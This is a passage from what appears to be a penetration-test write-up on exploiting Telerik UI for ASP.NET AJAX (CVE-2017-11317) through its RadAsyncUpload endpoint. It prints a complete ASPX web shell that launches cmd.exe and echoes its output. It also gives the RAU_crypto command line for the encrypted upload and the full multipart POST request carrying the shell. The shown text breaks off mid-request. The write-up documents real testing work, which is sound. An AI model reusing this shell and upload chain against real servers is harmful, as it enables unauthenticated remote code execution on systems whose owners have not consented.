href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11317" spellcheck="false" style="-webkit-user-drag: none; box-sizing: border-box; color: #4183c4; cursor: pointer;"><span class="md-plain" md-inline="plain" style="box-sizing: border-box;">CVE-2017-11317</span></a></span><span class="md-plain" md-inline="plain" style="box-sizing: border-box;">) was addressed within a real life scenario.</span></p><p cid="n14" class="md-end-block md-p" mdtype="paragraph" style="box-sizing: border-box; color: #333333; font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 16px; line-height: inherit; margin: 0.8em 0px; orphans: 4; position: relative; white-space: pre-wrap;"><span class="md-plain" md-inline="plain" style="box-sizing: border-box;">During a network penetration test for a client, the presence of Telerik UI was detected on a web application since it performed requests to the "<i>/Telerik.Web.UI.WebResource.axd"</i> endpoint to download JavaScript files for its UI. </span></p><p cid="n14" class="md-end-block md-p" mdtype="paragraph" style="box-sizing: border-box; color: #333333; font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 16px; line-height: inherit; margin: 0.8em 0px; orphans: 4; position: relative; white-space: pre-wrap;"><span class="md-plain" md-inline="plain" style="box-sizing: border-box;">By analyzing some response of the application it was possible to find the string </span>"<i>2014.2.724.40</i>" in a HTML comment, <span class="md-plain" md-inline="plain" style="box-sizing: border-box;">indicating the presence of Telerik UI version </span><span class="md-meta-i-c md-link" md-inline="link" style="box-sizing: border-box;"><a href="https://www.telerik.com/support/whats-new/aspnet-ajax/release-history/ui-for-asp-net-ajax-q2-2014-sp1-(version-2014-2-724)" spellcheck="false" style="-webkit-user-drag: none; box-sizing: border-box; color: #4183c4; cursor: pointer;"><span class="md-plain" md-inline="plain" style="box-sizing: border-box;">2014.2.724</span></a></span><span class="md-plain" md-inline="plain" style="box-sizing: border-box;"> vulnerable to the mentioned CVEs.</span></p><p cid="n15" class="md-end-block md-p" mdtype="paragraph" style="box-sizing: border-box; color: #333333; font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 16px; line-height: inherit; margin: 0.8em 0px; orphans: 4; position: relative; white-space: pre-wrap;"><span class="md-plain" md-inline="plain" style="box-sizing: border-box;">Also, thanks to a full path disclosure vulnerability of the application it was possible to identify the path of a folder within the web root of the application.</span></p><p cid="n16" class="md-end-block md-p" mdtype="paragraph" style="box-sizing: border-box; color: #333333; font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 16px; line-height: inherit; margin: 0.8em 0px; orphans: 4; position: relative; white-space: pre-wrap;"><span class="md-plain" md-inline="plain" style="box-sizing: border-box;">It was enough to upload a malicious ".aspx" file within the web root of the application and achieve an unauthenticated remote code execution:</span></p><pre cid="n18" class="md-fences md-end-block ty-contain-cm modeLoaded" lang="asp" mdtype="fences" spellcheck="false" style="background-attachment: inherit; background-clip: inherit; background-color: #f8f8f8; background-image: inherit; background-origin: inherit; background-position: inherit; background-repeat: inherit; background-size: inherit; border-radius: 3px; border: 1px solid rgb(231, 234, 237); box-sizing: border-box; break-inside: avoid; color: #333333; font-family: var(--monospace); font-size: 0.9em; margin-bottom: 15px; margin-top: 15px; overflow: visible; padding: 8px 4px 6px; position: relative; white-space: normal; width: inherit;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><%<span class="cm-meta" style="box-sizing: border-box; color: #555555;">@</span> <span class="cm-variable" style="box-sizing: border-box; color: black;">Page</span> <span class="cm-variable" style="box-sizing: border-box; color: black;">Language</span><span class="cm-operator" style="box-sizing: border-box; color: #981a1a;">=</span><span class="cm-string" style="box-sizing: border-box; color: #aa1111;">"VB"</span> <span class="cm-variable" style="box-sizing: border-box; color: black;">Debug</span><span class="cm-operator" style="box-sizing: border-box; color: #981a1a;">=</span><span class="cm-string" style="box-sizing: border-box; color: #aa1111;">"true"</span> %></span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><%<span class="cm-meta" style="box-sizing: border-box; color: #555555;">@</span> <span class="cm-variable" style="box-sizing: border-box; color: black;">import</span> <span class="cm-variable" style="box-sizing: border-box; color: black;">Namespace</span><span class="cm-operator" style="box-sizing: border-box; color: #981a1a;">=</span><span class="cm-string" style="box-sizing: border-box; color: #aa1111;">"system.IO"</span> %></span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><%<span class="cm-meta" style="box-sizing: border-box; color: #555555;">@</span> <span class="cm-variable" style="box-sizing: border-box; color: black;">import</span> <span class="cm-variable" style="box-sizing: border-box; color: black;">Namespace</span><span class="cm-operator" style="box-sizing: border-box; color: #981a1a;">=</span><span class="cm-string" style="box-sizing: border-box; color: #aa1111;">"System.Diagnostics"</span> %></span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span cm-text="" style="box-sizing: border-box;"></span></span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-tag cm-bracket" style="box-sizing: border-box; color: #117700;"><</span><span class="cm-tag" style="box-sizing: border-box; color: #117700;">html</span> <span class="cm-attribute" style="box-sizing: border-box; color: #0000cc;">xmlns</span>=<span class="cm-string" style="box-sizing: border-box; color: #aa1111;">"www.w3.org/1999/xhtml"</span><span class="cm-tag cm-bracket" style="box-sizing: border-box; color: #117700;">></span></span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-tag cm-bracket" style="box-sizing: border-box; color: #117700;"><</span><span class="cm-tag" style="box-sizing: border-box; color: #117700;">head</span> <span class="cm-attribute" style="box-sizing: border-box; color: #0000cc;">runat</span>=<span class="cm-string" style="box-sizing: border-box; color: #aa1111;">"server"</span><span class="cm-tag cm-bracket" style="box-sizing: border-box; color: #117700;">></span></span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-tab" cm-text=" " face="var(--monospace)" role="presentation" style="box-sizing: border-box; display: inline-block; position: relative;"> </span><span class="cm-tag cm-bracket" style="box-sizing: border-box; color: #117700;"><</span><span class="cm-tag" style="box-sizing: border-box; color: #117700;">title</span><span class="cm-tag cm-bracket" style="box-sizing: border-box; color: #117700;">></span>Test<span class="cm-tag cm-bracket" style="box-sizing: border-box; color: #117700;"></</span><span class="cm-tag" style="box-sizing: border-box; color: #117700;">title</span><span class="cm-tag cm-bracket" style="box-sizing: border-box; color: #117700;">></span></span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-tag cm-bracket" style="box-sizing: border-box; color: #117700;"></</span><span class="cm-tag" style="box-sizing: border-box; color: #117700;">head</span><span class="cm-tag cm-bracket" style="box-sizing: border-box; color: #117700;">></span></span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-tag cm-bracket" style="box-sizing: border-box; color: #117700;"><</span><span class="cm-tag" style="box-sizing: border-box; color: #117700;">body</span><span class="cm-tag cm-bracket" style="box-sizing: border-box; color: #117700;">></span></span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-tab" cm-text=" " face="var(--monospace)" role="presentation" style="box-sizing: border-box; display: inline-block; position: relative;"> </span><span class="cm-tag cm-bracket" style="box-sizing: border-box; color: #117700;"><</span><span class="cm-tag" style="box-sizing: border-box; color: #117700;">form</span> <span class="cm-attribute" style="box-sizing: border-box; color: #0000cc;">id</span>=<span class="cm-string" style="box-sizing: border-box; color: #aa1111;">"form1"</span> <span class="cm-attribute" style="box-sizing: border-box; color: #0000cc;">runat</span>=<span class="cm-string" style="box-sizing: border-box; color: #aa1111;">"server"</span><span class="cm-tag cm-bracket" style="box-sizing: border-box; color: #117700;">></span></span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-tab" cm-text=" " face="var(--monospace)" role="presentation" style="box-sizing: border-box; display: inline-block; position: relative;"> </span><span class="cm-tag cm-bracket" style="box-sizing: border-box; color: #117700;"><</span><span class="cm-tag" style="box-sizing: border-box; color: #117700;">div</span><span class="cm-tag cm-bracket" style="box-sizing: border-box; color: #117700;">></span></span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-tab" cm-text=" " face="var(--monospace)" role="presentation" style="box-sizing: border-box; display: inline-block; position: relative;"> </span><% </span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-tab" cm-text=" " face="var(--monospace)" role="presentation" style="box-sizing: border-box; display: inline-block; position: relative;"> </span><span class="cm-variable" style="box-sizing: border-box; color: black;">Dim</span> <span class="cm-variable" style="box-sizing: border-box; color: black;">myProcess</span> <span class="cm-variable" style="box-sizing: border-box; color: black;">As</span> <span class="cm-variable" style="box-sizing: border-box; color: black;">New</span> <span class="cm-def" style="box-sizing: border-box; color: blue;">Process</span>() </span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-tab" cm-text=" " face="var(--monospace)" role="presentation" style="box-sizing: border-box; display: inline-block; position: relative;"> </span><span class="cm-variable" style="box-sizing: border-box; color: black;">Dim</span> <span class="cm-variable" style="box-sizing: border-box; color: black;">myProcessStartInfo</span> <span class="cm-variable" style="box-sizing: border-box; color: black;">As</span> <span class="cm-variable" style="box-sizing: border-box; color: black;">New</span> <span class="cm-def" style="box-sizing: border-box; color: blue;">ProcessStartInfo</span>(<span class="cm-string" style="box-sizing: border-box; color: #aa1111;">"c:\windows\system32\cmd.exe"</span>)</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-tab" cm-text=" " face="var(--monospace)" role="presentation" style="box-sizing: border-box; display: inline-block; position: relative;"> </span><span class="cm-variable" style="box-sizing: border-box; color: black;">myProcessStartInfo</span>.<span class="cm-variable" style="box-sizing: border-box; color: black;">UseShellExecute</span> <span class="cm-operator" style="box-sizing: border-box; color: #981a1a;">=</span> <span class="cm-atom" style="box-sizing: border-box; color: #221199;">false</span></span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-tab" cm-text=" " face="var(--monospace)" role="presentation" style="box-sizing: border-box; display: inline-block; position: relative;"> </span><span class="cm-variable" style="box-sizing: border-box; color: black;">myProcessStartInfo</span>.<span class="cm-variable" style="box-sizing: border-box; color: black;">RedirectStandardOutput</span> <span class="cm-operator" style="box-sizing: border-box; color: #981a1a;">=</span> <span class="cm-atom" style="box-sizing: border-box; color: #221199;">true</span></span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-tab" cm-text=" " face="var(--monospace)" role="presentation" style="box-sizing: border-box; display: inline-block; position: relative;"> </span><span class="cm-variable" style="box-sizing: border-box; color: black;">myProcess</span>.<span class="cm-variable" style="box-sizing: border-box; color: black;">StartInfo</span> <span class="cm-operator" style="box-sizing: border-box; color: #981a1a;">=</span> <span class="cm-variable" style="box-sizing: border-box; color: black;">myProcessStartInfo</span></span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-tab" cm-text=" " face="var(--monospace)" role="presentation" style="box-sizing: border-box; display: inline-block; position: relative;"> </span><span class="cm-variable" style="box-sizing: border-box; color: black;">myProcessStartInfo</span>.<span class="cm-variable" style="box-sizing: border-box; color: black;">Arguments</span><span class="cm-operator" style="box-sizing: border-box; color: #981a1a;">=</span><span class="cm-string" style="box-sizing: border-box; color: #aa1111;">"/c dir"</span></span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-tab" cm-text=" " face="var(--monospace)" role="presentation" style="box-sizing: border-box; display: inline-block; position: relative;"> </span><span class="cm-variable" style="box-sizing: border-box; color: black;">myProcess</span>.<span class="cm-variable" style="box-sizing: border-box; color: black;">Start</span>()</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-tab" cm-text=" " face="var(--monospace)" role="presentation" style="box-sizing: border-box; display: inline-block; position: relative;"> </span><span class="cm-variable" style="box-sizing: border-box; color: black;">Dim</span> <span class="cm-variable" style="box-sizing: border-box; color: black;">myStreamReader</span> <span class="cm-variable" style="box-sizing: border-box; color: black;">As</span> <span class="cm-variable" style="box-sizing: border-box; color: black;">StreamReader</span> <span class="cm-operator" style="box-sizing: border-box; color: #981a1a;">=</span> <span class="cm-variable" style="box-sizing: border-box; color: black;">myProcess</span>.<span class="cm-variable" style="box-sizing: border-box; color: black;">StandardOutput</span></span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-tab" cm-text=" " face="var(--monospace)" role="presentation" style="box-sizing: border-box; display: inline-block; position: relative;"> </span><span class="cm-variable" style="box-sizing: border-box; color: black;">Dim</span> <span class="cm-variable" style="box-sizing: border-box; color: black;">myString</span> <span class="cm-variable" style="box-sizing: border-box; color: black;">As</span> <span class="cm-variable-3" style="box-sizing: border-box; color: #008855;">String</span> <span class="cm-operator" style="box-sizing: border-box; color: #981a1a;">=</span> <span class="cm-variable" style="box-sizing: border-box; color: black;">myStreamReader</span>.<span class="cm-variable" style="box-sizing: border-box; color: black;">Readtoend</span>()</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-tab" cm-text=" " face="var(--monospace)" role="presentation" style="box-sizing: border-box; display: inline-block; position: relative;"> </span><span class="cm-variable" style="box-sizing: border-box; color: black;">myProcess</span>.<span class="cm-variable" style="box-sizing: border-box; color: black;">Close</span>()</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-tab" cm-text=" " face="var(--monospace)" role="presentation" style="box-sizing: border-box; display: inline-block; position: relative;"> </span><span class="cm-variable" style="box-sizing: border-box; color: black;">mystring</span><span class="cm-operator" style="box-sizing: border-box; color: #981a1a;">=</span><span class="cm-variable" style="box-sizing: border-box; color: black;">replace</span>(<span class="cm-variable" style="box-sizing: border-box; color: black;">mystring</span>,<span class="cm-string" style="box-sizing: border-box; color: #aa1111;">"<"</span>,<span class="cm-string" style="box-sizing: border-box; color: #aa1111;">"&lt;"</span>)</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-tab" cm-text=" " face="var(--monospace)" role="presentation" style="box-sizing: border-box; display: inline-block; position: relative;"> </span><span class="cm-variable" style="box-sizing: border-box; color: black;">mystring</span><span class="cm-operator" style="box-sizing: border-box; color: #981a1a;">=</span><span class="cm-variable" style="box-sizing: border-box; color: black;">replace</span>(<span class="cm-variable" style="box-sizing: border-box; color: black;">mystring</span>,<span class="cm-string" style="box-sizing: border-box; color: #aa1111;">">"</span>,<span class="cm-string" style="box-sizing: border-box; color: #aa1111;">"&gt;"</span>)</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-tab" cm-text=" " face="var(--monospace)" role="presentation" style="box-sizing: border-box; display: inline-block; position: relative;"> </span><span class="cm-variable" style="box-sizing: border-box; color: black;">Response</span>.<span class="cm-variable" style="box-sizing: border-box; color: black;">Write</span>(<span class="cm-variable" style="box-sizing: border-box; color: black;">vbcrlf</span> <span class="cm-operator" style="box-sizing: border-box; color: #981a1a;">&</span> <span class="cm-string" style="box-sizing: border-box; color: #aa1111;">"<pre>"</span> <span class="cm-operator" style="box-sizing: border-box; color: #981a1a;">&</span> <span class="cm-variable" style="box-sizing: border-box; color: black;">mystring</span> <span class="cm-operator" style="box-sizing: border-box; color: #981a1a;">&</span> <span class="cm-string" style="box-sizing: border-box; color: #aa1111;">"</pre>"</span>)</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-tab" cm-text=" " face="var(--monospace)" role="presentation" style="box-sizing: border-box; display: inline-block; position: relative;"> </span>%></span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-tab" cm-text=" " face="var(--monospace)" role="presentation" style="box-sizing: border-box; display: inline-block; position: relative;"> </span><span class="cm-tag cm-bracket" style="box-sizing: border-box; color: #117700;"></</span><span class="cm-tag" style="box-sizing: border-box; color: #117700;">div</span><span class="cm-tag cm-bracket" style="box-sizing: border-box; color: #117700;">></span></span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-tab" cm-text=" " face="var(--monospace)" role="presentation" style="box-sizing: border-box; display: inline-block; position: relative;"> </span><span class="cm-tag cm-bracket" style="box-sizing: border-box; color: #117700;"></</span><span class="cm-tag" style="box-sizing: border-box; color: #117700;">form</span><span class="cm-tag cm-bracket" style="box-sizing: border-box; color: #117700;">></span></span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-tag cm-bracket" style="box-sizing: border-box; color: #117700;"></</span><span class="cm-tag" style="box-sizing: border-box; color: #117700;">body</span><span class="cm-tag cm-bracket" style="box-sizing: border-box; color: #117700;">></span></span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-tag cm-bracket" style="box-sizing: border-box; color: #117700;"></</span><span class="cm-tag" style="box-sizing: border-box; color: #117700;">html</span><span class="cm-tag cm-bracket" style="box-sizing: border-box; color: #117700;">></span></span></pre><p cid="n19" class="md-end-block md-p" mdtype="paragraph" style="box-sizing: border-box; color: #333333; font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 16px; line-height: inherit; margin: 0.8em 0px; orphans: 4; position: relative; white-space: pre-wrap;"></p><p cid="n20" class="md-end-block md-p" mdtype="paragraph" style="box-sizing: border-box; color: #333333; font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 16px; line-height: inherit; margin: 0.8em 0px; orphans: 4; position: relative; white-space: pre-wrap;"><span style="font-size: 1.5em;">File Upload Exploitation</span></p><p cid="n23" class="md-end-block md-p" mdtype="paragraph" style="box-sizing: border-box; color: #333333; font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 16px; line-height: inherit; margin: 0.8em 0px; orphans: 4; position: relative; white-space: pre-wrap;"><span class="md-plain" md-inline="plain" style="box-sizing: border-box;"></span></p><p cid="n20" class="md-end-block md-p" mdtype="paragraph" style="box-sizing: border-box; color: #333333; font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 16px; line-height: inherit; margin: 0.8em 0px; orphans: 4; position: relative; white-space: pre-wrap;"><span class="md-plain" md-inline="plain" style="box-sizing: border-box;">In order to upload the aspx file, the </span><span class="md-meta-i-c md-link" md-inline="link" style="box-sizing: border-box;"><a href="https://github.com/bao7uo/RAU_crypto" spellcheck="false" style="-webkit-user-drag: none; box-sizing: border-box; color: #4183c4; cursor: pointer;"><span class="md-plain" md-inline="plain" style="box-sizing: border-box;">RAU_crypto</span></a></span><span class="md-plain" md-inline="plain" style="box-sizing: border-box;"> tool was used to automatically create a valid file upload request encrypted with the hard-coded key of Telerik.</span></p><p cid="n24" class="md-end-block md-p" mdtype="paragraph" style="box-sizing: border-box; color: #333333; font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 16px; line-height: inherit; margin: 0.8em 0px; orphans: 4; position: relative; white-space: pre-wrap;"><span class="md-plain" md-inline="plain" style="box-sizing: border-box;">The tool was invoked using the following command line string:</span></p><pre cid="n25" class="md-fences md-end-block ty-contain-cm modeLoaded" lang="" mdtype="fences" spellcheck="false" style="background-attachment: inherit; background-clip: inherit; background-color: #f8f8f8; background-image: inherit; background-origin: inherit; background-position: inherit; background-repeat: inherit; background-size: inherit; border-radius: 3px; border: 1px solid rgb(231, 234, 237); box-sizing: border-box; break-inside: avoid; color: #333333; font-family: var(--monospace); font-size: 0.9em; margin-bottom: 15px; margin-top: 15px; overflow: visible; padding: 8px 4px 6px; position: relative; white-space: normal; width: inherit;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">python RAU_crypto.py -P c:\\destination\\folder 2014.2.724 malicious.aspx http://victim.com/Telerik.Web.UI.WebResource.axd?type=rau BurpProxyHost:8080</span></pre><p cid="n26" class="md-end-block md-p" mdtype="paragraph" style="box-sizing: border-box; color: #333333; font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 16px; line-height: inherit; margin: 0.8em 0px; orphans: 4; position: relative; white-space: pre-wrap;"><span class="md-plain" md-inline="plain" style="box-sizing: border-box;">The command line parameters contain the following information:</span></p><ol cid="n27" class="ol-list" mdtype="list" start="" style="box-sizing: border-box; color: #333333; font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 16px; margin: 0.8em 0px; padding-left: 30px; position: relative;"><li cid="n28" class="md-list-item" mdtype="list_item" style="box-sizing: border-box; margin: 0px; position: relative;"><p cid="n29" class="md-end-block md-p" mdtype="paragraph" style="box-sizing: border-box; line-height: inherit; margin: 0px 0px 0.5rem; orphans: 4; position: relative; white-space: pre-wrap;"><span class="md-plain" md-inline="plain" style="box-sizing: border-box;">The P parameter contains the path of the destination folder where the file needs to be uploaded. In our case it contained the path of the web root we discovered at an earlier stage.</span></p></li><li cid="n30" class="md-list-item" mdtype="list_item" style="box-sizing: border-box; margin: 0px; position: relative;"><p cid="n31" class="md-end-block md-p" mdtype="paragraph" style="box-sizing: border-box; line-height: inherit; margin: 0px 0px 0.5rem; orphans: 4; position: relative; white-space: pre-wrap;"><span class="md-plain" md-inline="plain" style="box-sizing: border-box;">The version of Telerik UI so that the tool can use the correct key to encrypt the </span><span class="md-pair-s" md-inline="em" style="box-sizing: border-box;"><em style="box-sizing: border-box;"><span class="md-plain" md-inline="plain" style="box-sizing: border-box;">rauPostData</span></em></span></p></li><li cid="n32" class="md-list-item" mdtype="list_item" style="box-sizing: border-box; margin: 0px; position: relative;"><p cid="n33" class="md-end-block md-p" mdtype="paragraph" style="box-sizing: border-box; line-height: inherit; margin: 0px 0px 0.5rem; orphans: 4; position: relative; white-space: pre-wrap;"><span class="md-plain" md-inline="plain" style="box-sizing: border-box;">The file to upload. In our case, the malicious .aspx file shown above.</span></p></li><li cid="n34" class="md-list-item" mdtype="list_item" style="box-sizing: border-box; margin: 0px; position: relative;"><p cid="n35" class="md-end-block md-p" mdtype="paragraph" style="box-sizing: border-box; line-height: inherit; margin: 0px 0px 0.5rem; orphans: 4; position: relative; white-space: pre-wrap;"><span class="md-plain" md-inline="plain" style="box-sizing: border-box;">The target URL of the Telerik RadAsyncUpload endpoint.</span></p></li><li cid="n36" class="md-list-item" mdtype="list_item" style="box-sizing: border-box; margin: 0px; position: relative;"><p cid="n37" class="md-end-block md-p" mdtype="paragraph" style="box-sizing: border-box; line-height: inherit; margin: 0px 0px 0.5rem; orphans: 4; position: relative; white-space: pre-wrap;"><span class="md-plain" md-inline="plain" style="box-sizing: border-box;">The address of a proxy to inspect the requests performed by the tool</span></p></li></ol><p cid="n38" class="md-end-block md-p" mdtype="paragraph" style="box-sizing: border-box; color: #333333; font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 16px; line-height: inherit; margin: 0.8em 0px; orphans: 4; position: relative; white-space: pre-wrap;"><span class="md-plain" md-inline="plain" style="box-sizing: border-box;">By launching the tool, the following request was performed:</span></p><pre cid="n40" class="md-fences md-end-block ty-contain-cm modeLoaded" lang="http" mdtype="fences" spellcheck="false" style="background-attachment: inherit; background-clip: inherit; background-color: #f8f8f8; background-image: inherit; background-origin: inherit; background-position: inherit; background-repeat: inherit; background-size: inherit; border-radius: 3px; border: 1px solid rgb(231, 234, 237); box-sizing: border-box; break-inside: avoid; color: #333333; font-family: var(--monospace); font-size: 0.9em; margin-bottom: 15px; margin-top: 15px; overflow: visible; padding: 8px 4px 6px; position: relative; white-space: normal; width: inherit;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-keyword" style="box-sizing: border-box; color: #770088;">POST</span> <span class="cm-string-2" style="box-sizing: border-box; color: #ff5500;">/ApplicationPath/Telerik.Web.UI.WebResource.axd?type=rau</span> <span class="cm-keyword" style="box-sizing: border-box; color: #770088;">HTTP/1.1</span></span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-atom" style="box-sizing: border-box; color: #221199;">Host:</span><span class="cm-string" style="box-sizing: border-box; color: #aa1111;"> victim.com</span></span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-atom" style="box-sizing: border-box; color: #221199;">Accept-Encoding:</span><span class="cm-string" style="box-sizing: border-box; color: #aa1111;"> gzip, deflate</span></span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-atom" style="box-sizing: border-box; color: #221199;">Content-Length:</span><span class="cm-string" style="box-sizing: border-box; color: #aa1111;"> 3221</span></span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-atom" style="box-sizing: border-box; color: #221199;">Content-Type:</span><span class="cm-string" style="box-sizing: border-box; color: #aa1111;"> multipart/form-data; boundary=---------------------------62616f37756f2f</span></span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-atom" style="box-sizing: border-box; color: #221199;">Connection:</span><span class="cm-string" style="box-sizing: border-box; color: #aa1111;"> close</span></span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span cm-text="" style="box-sizing: border-box;"></span></span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">-----------------------------62616f37756f2f</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">Content-Disposition: form-data; name="rauPostData"</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span cm-text="" style="box-sizing: border-box;"></span></span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">ATTu5i4R+V[Encrypted rauPostData Payload in base64]FAlzLUg==</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">-----------------------------62616f37756f2f</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">Content-Disposition: form-data; name="file"; filename="blob"</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">Content-Type: application/octet-stream</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span cm-text="" style="box-sizing: border-box;"></span></span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><%@ Page Language="VB" Debug="true" %></span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><%@ import Namespace="system.IO" %></span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><%@ import Namespace="System.Diagnostics" %></span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span cm-text="" style="box-sizing: border-box;"></span></span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><html xmlns="www.w3.org/1999/xhtml"></span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><head runat="server"></span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-tab" cm-text=" " face="var(--monospace)" role="presentation" style="box-sizing: border-box; display: inline-block; position: relative;"> </span><title>Test</title></span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"></head></span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><body></span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-tab" cm-text=" " face="var(--monospace)" role="presentation" style="box-sizing: border-box; display: inline-block; position: relative;"> </span><form id="form1" runat="server"></span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-tab" cm-text=" " face="var(--monospace)" role="presentation" style="box-sizing: border-box; display: inline-block; position: relative;"> </span><div></span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-tab" cm-text=" " face="var(--monospace)" role="presentation" style="box-sizing: border-box; display: inline-block; position: relative;"> </span><% </span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-tab" cm-text=" " face="var(--monospace)" role="presentation" style="box-sizing: border-box; display: inline-block; position: relative;"> </span>Dim myProcess As New Process() </span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-tab" cm-text=" " face="var(--monospace)" role="presentation" style="box-sizing: border-box; display: inline-block; position: relative;"> </span>Dim myProcessStartInfo As New ProcessStartInfo("c:\windows\system32\cmd.exe")</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-tab" cm-text=" " face="var(--monospace)" role="presentation" style="box-sizing: border-box; display: inline-block; position: relative;"> </span>myProcessStartInfo.UseShellExecute = false</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-tab" cm-text=" " face="var(--monospace)" role="presentation" style="box-sizing: border-box; display: inline-block; position: relative;"> </span>myProcessStartInfo.RedirectStandardOutput = true</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-tab" cm-text=" " face="var(--monospace)" role="presentation" style="box-sizing: border-box; display: inline-block; position: relative;"> </span>myProcess.StartInfo = myProcessStartInfo</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-tab" cm-text=" " face="var(--monospace)" role="presentation" style="box-sizing: border-box; display: inline-block; position: relative;"> </span>myProcessStartInfo.Arguments="/c dir"</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-tab" cm-text=" " face="var(--monospace)" role="presentation" style="box-sizing: border-box; display: inline-block; position: relative;"> </span>myProcess.Start()</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-tab" cm-text=" " face="var(--monospace)" role="presentation" style="box-sizing: border-box; display: inline-block; position: relative;"> </span>Dim myStreamReader As StreamReader = myProcess.StandardOutput</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 